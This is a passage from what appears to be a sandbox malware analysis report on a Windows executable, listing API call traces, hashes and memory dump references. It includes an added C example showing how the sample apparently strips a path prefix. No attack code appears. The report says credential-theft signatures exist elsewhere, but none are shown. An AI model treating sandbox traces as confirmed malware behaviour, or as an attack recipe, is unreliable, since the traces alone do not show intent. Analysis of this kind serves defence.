                                        • GetProcAddress.KERNEL32(?,SHBrowseForFolder), ref: 0040379C
                                        • GetProcAddress.KERNEL32(?,SHGetPathFromIDList), ref: 004037EB
                                        • CoTaskMemFree.COMBASE(?), ref: 00403806
                                        • strlen.MSVCRT ref: 0040380D
                                        • FreeLibrary.KERNEL32(?,00000000), ref: 00403829
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AddressFreeLibraryProcstrlen$InitializeLoadTaskmemsetstrncpy
                                        • String ID: @$SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                        • API String ID: 1137656791-1801489780
                                        • Opcode ID: d0772f556505189ebe70807fcab58d77b8969dd6fcc445947570fce6bb494dae
                                        • Instruction ID: 3440e14c815a203a1a78cd3407a2a10063d2b49fea99d3606607f3928df854cf
                                        • Opcode Fuzzy Hash: d0772f556505189ebe70807fcab58d77b8969dd6fcc445947570fce6bb494dae
                                        • Instruction Fuzzy Hash: AF419171800208AFDB11EFA5CC45ADE7FB8AF05315F0080BAF554BA292D7B99E14CF59
                                        APIs
                                        • GetWindow.USER32(00000000,00000004), ref: 0040494B
                                        • SetActiveWindow.USER32(00000000), ref: 0040495C
                                        • RemovePropA.USER32(00000000,PB_WindowID), ref: 00404970
                                        • RemovePropA.USER32(00000000,PB_DropAccept), ref: 00404979
                                        • RevokeDragDrop.OLE32(00000000), ref: 00404982
                                        • SendMessageA.USER32(?,00000221,00000000,00000000), ref: 00404999
                                        • sprintf.MSVCRT ref: 004049B8
                                        • UnregisterClassA.USER32(?), ref: 004049CD
                                        • HeapFree.KERNEL32(00000000,?), ref: 004049E3
                                        • DestroyAcceleratorTable.USER32(?), ref: 004049EC
                                        • DeleteObject.GDI32(?), ref: 004049FA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: PropRemoveWindow$AcceleratorActiveClassDeleteDestroyDragDropFreeHeapMessageObjectRevokeSendTableUnregistersprintf
                                        • String ID: PB_DropAccept$PB_WindowID$WindowClass_%d
                                        • API String ID: 192457453-976223216
                                        • Opcode ID: 884db38a7d1111d9f10292c509c9a9f5fdc1eb4f4251496c9c73458246e950c8
                                        • Instruction ID: 76adc180981eb15cd37713a9aaa1cc34ae54204bacec3ed2c8797916cc70c0fb
                                        • Opcode Fuzzy Hash: 884db38a7d1111d9f10292c509c9a9f5fdc1eb4f4251496c9c73458246e950c8
                                        • Instruction Fuzzy Hash: CC214CB1500305EBDB216F71ED09F5B7BB9EB44740F148439FA41B21A0C736D8659B9D
                                        APIs
                                        • HeapFree.KERNEL32(00000000,?), ref: 00404F58
                                        • HeapFree.KERNEL32(00000000,?), ref: 00404F64
                                        • HeapFree.KERNEL32(00000000,?), ref: 00404F90
                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FB8
                                        • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,000000FF,000001FF), ref: 00404FD5
                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000003), ref: 00404FEB
                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404FF7
                                        • GetActiveWindow.USER32 ref: 00404FFD
                                        • TranslateAccelerator.USER32(00000000,00000000,?), ref: 00405015
                                        • TranslateMessage.USER32(?), ref: 00405023
                                        • DispatchMessageA.USER32(?), ref: 0040502D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Message$FreeHeap$PeekTranslate$AcceleratorActiveDispatchMultipleObjectsWaitWindow
                                        • String ID:
                                        • API String ID: 1286715895-0
                                        • Opcode ID: 3aa7afa24f23fb48fd7e382b0f9acd0eb5a68456695db67f310d9a4f03716252
                                        • Instruction ID: df21f5fe5c289298ab728cd37bb52f6d8c99b9184479e931f6e0fc541ff44454
                                        • Opcode Fuzzy Hash: 3aa7afa24f23fb48fd7e382b0f9acd0eb5a68456695db67f310d9a4f03716252
                                        • Instruction Fuzzy Hash: 14415CB0900706EFCB20DF65DD88C6BBBF8EB85740710853AF556E62A0D338D945CB69
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Focus$ActiveChildClassNameParentWindowstrcmp
                                        • String ID: MDI_ChildClass
                                        • API String ID: 1701595447-1946758919
                                        • Opcode ID: c352efb6cce607ec546e30be8c2b5fe9326b74cc56803c011c7057062d4ff570
                                        • Instruction ID: d253d9b16c365dcb60b46e847a60c04356fa5ff6473b175f6f9f07f47c3fcc33
                                        • Opcode Fuzzy Hash: c352efb6cce607ec546e30be8c2b5fe9326b74cc56803c011c7057062d4ff570
                                        • Instruction Fuzzy Hash: 1C210C72D04719EBDF11AFA59D488AFBBB8FE44301B20843BE501B2290D7384E51DF5A
                                        APIs
                                          • Part of subcall function 0040523F: SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                          • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000010), ref: 004052B8
                                          • Part of subcall function 0040523F: GetWindowRect.USER32(?,00000020), ref: 004052C1
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                          • Part of subcall function 0040523F: GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000005), ref: 004052F1
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000002E), ref: 00405311
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000022), ref: 00405320
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(00000023), ref: 00405327
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                          • Part of subcall function 0040523F: GetSystemMetrics.USER32(0000003C), ref: 00405335
                                          • Part of subcall function 0040523F: SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                          • Part of subcall function 0040523F: GetKeyState.USER32(00000001), ref: 0040534E
                                          • Part of subcall function 0040523F: SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                          • Part of subcall function 0040523F: SetCapture.USER32(?), ref: 00405369
                                          • Part of subcall function 0040523F: PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                        • GetPropA.USER32(?,PB_WindowID), ref: 00405736
                                        • GetParent.USER32(?), ref: 00405746
                                        • GetClientRect.USER32(?,00000000), ref: 004058A2
                                        • FillRect.USER32(?,00000000,?), ref: 004058B2
                                        • GetWindowLongA.USER32(?,000000F4), ref: 0040593F
                                        • PostMessageA.USER32(?,000030D6,?,?), ref: 00405AB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: System$Metrics$MessageRectWindow$LongPostSend$CaptureClientFillInfoParametersParentPropState
                                        • String ID: PB_WindowID
                                        • API String ID: 2736716905-1508741625
                                        • Opcode ID: 57c730f274317fda02807e17650faa5da67cc4a28ae41b1b925619af7619a5b7
                                        • Instruction ID: 29e404874b04c4d69bc6432aaff022b43f6243613acb16a20f2353146ae1e986
                                        • Opcode Fuzzy Hash: 57c730f274317fda02807e17650faa5da67cc4a28ae41b1b925619af7619a5b7
                                        • Instruction Fuzzy Hash: FAB1AE71600A06EBDF20AF55C884ABB7BB1EB54314F60843BF845B62D0D3399A91EF5D
                                        APIs
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00403858
                                        • GetCurrentThreadId.KERNEL32 ref: 00403866
                                        • IsWindowVisible.USER32(?), ref: 0040386D
                                        • IsWindowEnabled.USER32(?), ref: 00403878
                                        • GetForegroundWindow.USER32 ref: 00403882
                                        • EnableWindow.USER32(?,00000000), ref: 0040388F
                                          • Part of subcall function 004067DA: RtlAllocateHeap.NTDLL(00000008,?,00406649), ref: 004067E6
                                        • GetCurrentThreadId.KERNEL32 ref: 004038A8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$Thread$Current$AllocateEnableEnabledForegroundHeapProcessVisible
                                        • String ID:
                                        • API String ID: 2983394722-0
                                        • Opcode ID: c450f822fb23aaa1f07191116ce03786d4f9d21f61ba6e89b33f6b73c8d7f18a
                                        • Instruction ID: b1902f0b285d8ff1f38c9be8955405961f45d1445ca6c4829f96fecf42db4020
                                        • Opcode Fuzzy Hash: c450f822fb23aaa1f07191116ce03786d4f9d21f61ba6e89b33f6b73c8d7f18a
                                        • Instruction Fuzzy Hash: 06F0F9322047109BE321BF75AD88B2F7AF8EF45B61B14843AF541F3291DB38D851966E
                                        APIs
                                        • IsWindowEnabled.USER32(00000133), ref: 004042FE
                                        • SetTextColor.GDI32(?,?), ref: 0040431E
                                        • GetSysColor.USER32(00000014), ref: 0040432C
                                        • SetBkColor.GDI32(?,00000000), ref: 00404334
                                        • GetSysColorBrush.USER32(00000014), ref: 00404338
                                        • SetBkColor.GDI32(?,?), ref: 0040434A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Color$BrushEnabledTextWindow
                                        • String ID:
                                        • API String ID: 3110319690-0
                                        • Opcode ID: 2586222dea3612670b7304aedc5cdf2e6f6e10432f4c11a66ce39ca8f2a3d8e0
                                        • Instruction ID: 3bac33a7e9d7aff12e56e7c95b9a227e0688ac08b885ac0313a6761ddb88b25f
                                        • Opcode Fuzzy Hash: 2586222dea3612670b7304aedc5cdf2e6f6e10432f4c11a66ce39ca8f2a3d8e0
                                        • Instruction Fuzzy Hash: F2012171200305AFD620AB69AC48957B3FCEB84331F045B3AFA65E32E1C774EC158A26
                                        APIs
                                        • SetWindowLongA.USER32(000000FF,000000FC,00404714), ref: 004047F5
                                        • SetWindowLongA.USER32(000000FF,000000F4,000000FF), ref: 00404800
                                        • SetPropA.USER32(000000FF,PB_ID,000000FF), ref: 0040480B
                                        • SendMessageA.USER32(000000FF,00000030,000000FF,00000001), ref: 0040481C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: LongWindow$MessagePropSend
                                        • String ID: PB_ID
                                        • API String ID: 499798845-4173770792
                                        • Opcode ID: 6c9e0b72c496245141bbbd0762a8a9e14c4b78381a73b06c8fa17946a66a15c7
                                        • Instruction ID: 95a633425f538de9a54c52fb3ff2f65ec4db39112d0deefb15a4c97684d4ca47
                                        • Opcode Fuzzy Hash: 6c9e0b72c496245141bbbd0762a8a9e14c4b78381a73b06c8fa17946a66a15c7
                                        • Instruction Fuzzy Hash: 900192B5500308BFCB119F55DD84E8A7BB8FB44760F20C626F925672D1C374D950CBA4
                                        APIs
                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00A405B8,?,?,?,00A412E0,?,00406244,00000001,00000001), ref: 00406090
                                        • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000004,00000080,00000000,00A405B8,?,?,?,00A412E0,?,00406244,00000001,00000001), ref: 004060B2
                                        • RtlAllocateHeap.NTDLL(00A40000,00000000,00001000), ref: 00406116
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: CreateFile$AllocateHeap
                                        • String ID:
                                        • API String ID: 2813278966-0
                                        • Opcode ID: aaea696fe30d237ab769c408f8669e979df440928f28e225a3f20fdb7f4e7eba
                                        • Instruction ID: 22e7740ac045cd4ad30a1761b82f9b87c0991fe1563c31a0c7e75b116f9b4f37
                                        • Opcode Fuzzy Hash: aaea696fe30d237ab769c408f8669e979df440928f28e225a3f20fdb7f4e7eba
                                        • Instruction Fuzzy Hash: 7321D67278031176E2309B28AC46F57B358A744B71F22873AF762BB2C0C7B5AC64479D
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$Focus$EnabledLongVisible
                                        • String ID:
                                        • API String ID: 1625685152-0
                                        • Opcode ID: 1cc726b80f6959b4fb63163bba2464a36b234552e2cf5b930eb7b1ae95d43349
                                        • Instruction ID: c6146cca50ef5e8f765ec7b6592dd4ff06736dc7ed718ebd510666ced0979e75
                                        • Opcode Fuzzy Hash: 1cc726b80f6959b4fb63163bba2464a36b234552e2cf5b930eb7b1ae95d43349
                                        • Instruction Fuzzy Hash: D0F049302087015FE7215F659D8876B72B8FF95755714843EF151F21D0C778D891DA1E
                                        APIs
                                        • SetTextColor.GDI32(?,?), ref: 00404195
                                        • GetSysColor.USER32(0000000F), ref: 004041A3
                                        • SetBkColor.GDI32(?,00000000), ref: 004041AB
                                        • GetSysColorBrush.USER32(0000000F), ref: 004041AF
                                        • SetBkColor.GDI32(?,?), ref: 004041C1
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Color$BrushText
                                        • String ID:
                                        • API String ID: 3324192670-0
                                        • Opcode ID: 54f08122a01e30bdfa786a13594a16f17e30ab6433d94faf13bd1f2d81774b56
                                        • Instruction ID: d8e8ad06d9decbb24c27d3cc026bde09b1a35479a682271e2c605a4ee8a6c308
                                        • Opcode Fuzzy Hash: 54f08122a01e30bdfa786a13594a16f17e30ab6433d94faf13bd1f2d81774b56
                                        • Instruction Fuzzy Hash: CDF044B1100304ABD220AB299C48967B3FCEBA4331F004B36FA75E32D1C774AC558A66
                                        APIs
                                        • memset.MSVCRT ref: 004043D8
                                        • CreateWindowExA.USER32(?,Edit,00000000,?,?,?,?,?,00000000,000000FF,00000000), ref: 00404466
                                        • SetWindowLongA.USER32(00000000,000000FC,Function_00004358), ref: 0040448A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: Window$CreateLongmemset
                                        • String ID: Edit
                                        • API String ID: 2917088559-554135844
                                        • Opcode ID: 447a2ae06f6b165a5cefae3f0fe963aec8ed8a20647a4be4382fc43a3d524c26
                                        • Instruction ID: 6d6bdd9e0c8eed947640fc1b11ecc7fcd9f2bd5d8b727347204d49e96c7c13b5
                                        • Opcode Fuzzy Hash: 447a2ae06f6b165a5cefae3f0fe963aec8ed8a20647a4be4382fc43a3d524c26
                                        • Instruction Fuzzy Hash: 7A217CB1500205ABDB215F12ED09F5B3FB5EB84325F10823EF960B62E1D77988249B9C
                                        APIs
                                          • Part of subcall function 00407750: RtlReAllocateHeap.NTDLL(00A30000,00000001,00A30700,000040FF), ref: 00407797
                                        • GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,?,?,?,00000000,00401B51,00000000,00000000,00000000,00000000,00000001,00000001,00000001,00000000), ref: 00403A95
                                        • strcmp.MSVCRT ref: 00403AA3
                                        • memmove.MSVCRT(00000000,00000004,-00000004,?,?,00000000,00401B51,00000000,00000000,00000000,00000000,00000001,00000001,00000001,00000000,00000000), ref: 00403AB7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateFileHeapModuleNamememmovestrcmp
                                        • String ID: \\?\
                                        • API String ID: 1538048364-4282027825
                                        • Opcode ID: 0d894860d998a38802a0c339f33e2d9615a6d37d521d3afdbe7a484fcb4a0eb9
                                        • Instruction ID: b2d6bd18301c6a615e078c624f6e571f893afb971f9df6f800e3a030ac3227e0
                                        • Opcode Fuzzy Hash: 0d894860d998a38802a0c339f33e2d9615a6d37d521d3afdbe7a484fcb4a0eb9
                                        • Instruction Fuzzy Hash: 90F027B36053016AD31066769D89E9B6B9CDF94364F104437F500E2182E638A91083B9
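                                         The record above (GetModuleFileNameA, a compare against the string `\\?\`, then memmove with a source offset of 4 and a length of len-4) is the API pattern of code that removes the Win32 extended-length path prefix from its own module path in place. The following is an added example written for this report and is not code recovered from the sample or produced by Joe Sandbox: it assumes the compare is a 4-byte prefix test (the trace labels it strcmp, which cannot be confirmed from the record), and its handling of the `\\?\UNC\` form is a generalisation of the same Win32 path rule, not something the trace shows.

```c
/* Added example, not code recovered from the sample: an in-place
 * implementation of what the API sequence above is consistent with
 * (GetModuleFileNameA, prefix compare against "\\?\", memmove by 4).
 * The "UNC\" handling is a generalisation of the same Win32 path rule
 * and is not something the trace shows. */
#include <stdio.h>
#include <string.h>

#define EXT_PREFIX     "\\\\?\\"   /* the four characters  \ \ ? \  */
#define EXT_PREFIX_LEN 4
#define UNC_TAG        "UNC\\"     /* \\?\UNC\server\share form */
#define UNC_TAG_LEN    4

/* Strips the extended-length prefix from a NUL-terminated path buffer.
 * Returns 1 if the buffer was rewritten, 0 if no prefix was present.
 * Moves len - 4 + 1 bytes so the terminator travels with the string;
 * the trace's length argument of -4 is consistent with len - 4, and
 * whether that count included the terminator cannot be read from it. */
int strip_extended_prefix(char *path)
{
    size_t len = strlen(path);

    if (len < EXT_PREFIX_LEN || strncmp(path, EXT_PREFIX, EXT_PREFIX_LEN) != 0)
        return 0;

    if (strncmp(path + EXT_PREFIX_LEN, UNC_TAG, UNC_TAG_LEN) == 0) {
        /* \\?\UNC\srv\share\f -> \\srv\share\f : keep the two leading
         * backslashes and drop "?\UNC\" (bytes 2..7). */
        size_t skip = EXT_PREFIX_LEN + UNC_TAG_LEN;   /* 8 */
        memmove(path + 2, path + skip, len - skip + 1);
        return 1;
    }

    memmove(path, path + EXT_PREFIX_LEN, len - EXT_PREFIX_LEN + 1);
    return 1;
}

int main(void)
{
    /* Constructed inputs, not paths observed in the report. */
    char local[] = "\\\\?\\C:\\Users\\user\\Desktop\\sample.exe";
    char unc[]   = "\\\\?\\UNC\\fileserver\\share\\sample.exe";
    char plain[] = "C:\\Windows\\System32\\cmd.exe";

    printf("%d %s\n", strip_extended_prefix(local), local);
    printf("%d %s\n", strip_extended_prefix(unc), unc);
    printf("%d %s\n", strip_extended_prefix(plain), plain);
    return 0;
}
```

                                         The one-byte overlap between source and destination is why the trace shows memmove rather than memcpy: the copy regions overlap, and only memmove is defined for that. When triaging, a prefix-strip like this on the module's own path is ordinary runtime behaviour (it is common in compiler runtimes and installers) and is not by itself an indicator; the credential-theft signatures elsewhere in this report come from other functions.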
                                        APIs
                                        • RtlInitializeCriticalSection.NTDLL(0040B40C), ref: 004040EA
                                        • GetStockObject.GDI32(00000011), ref: 004040F2
                                          • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                          • Part of subcall function 004066F1: RtlAllocateHeap.NTDLL(00000008,?), ref: 0040672E
                                          • Part of subcall function 00406434: RtlAllocateHeap.NTDLL(00000008,?), ref: 00406441
                                        • memset.MSVCRT ref: 0040412E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756411953.00000000004C3000.00000080.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756434708.00000000004C5000.00000004.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_ .jbxd
                                        Similarity
                                        • API ID: AllocateHeap$CriticalInitializeObjectSectionStockmemset
                                        • String ID: 3Ro
                                        • API String ID: 681713604-1492261280
                                        • Opcode ID: a8a5b75b4186f5b19981e93ddefbcc3adfbe2300ea032735be8ca8f602144bb4
                                        • Instruction ID: 8b4459e147fa465f05f031457460f5437a22d41cf9d00d9cfe2b139fd080bdb1
                                        • Opcode Fuzzy Hash: a8a5b75b4186f5b19981e93ddefbcc3adfbe2300ea032735be8ca8f602144bb4
                                        • Instruction Fuzzy Hash: 63F036B1A50304BAD700ABA09D4BF8D3BA8E704708F50403AB301B61C2DBF95654979D
                                        APIs
                                        • FindResourceA.KERNEL32(0040139A,00000000,0000000A), ref: 004020CE
                                        • LoadResource.KERNEL32(?,00000000,00000000,00000000,0040139A,OPS,00000000,00000000), ref: 004020E6
                                        • SizeofResource.KERNEL32(?,00000000,?,00000000,00000000,00000000,0040139A,OPS,00000000,00000000), ref: 004020F8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2756276210.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000001.00000002.2756241935.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000409000.00000040.00000001.01000000.00000005.sdmp
                                         • Associated: 00000001.00000002.2756276210.0000000000420000.00000040.00000001.01000000.00000005.sdmp
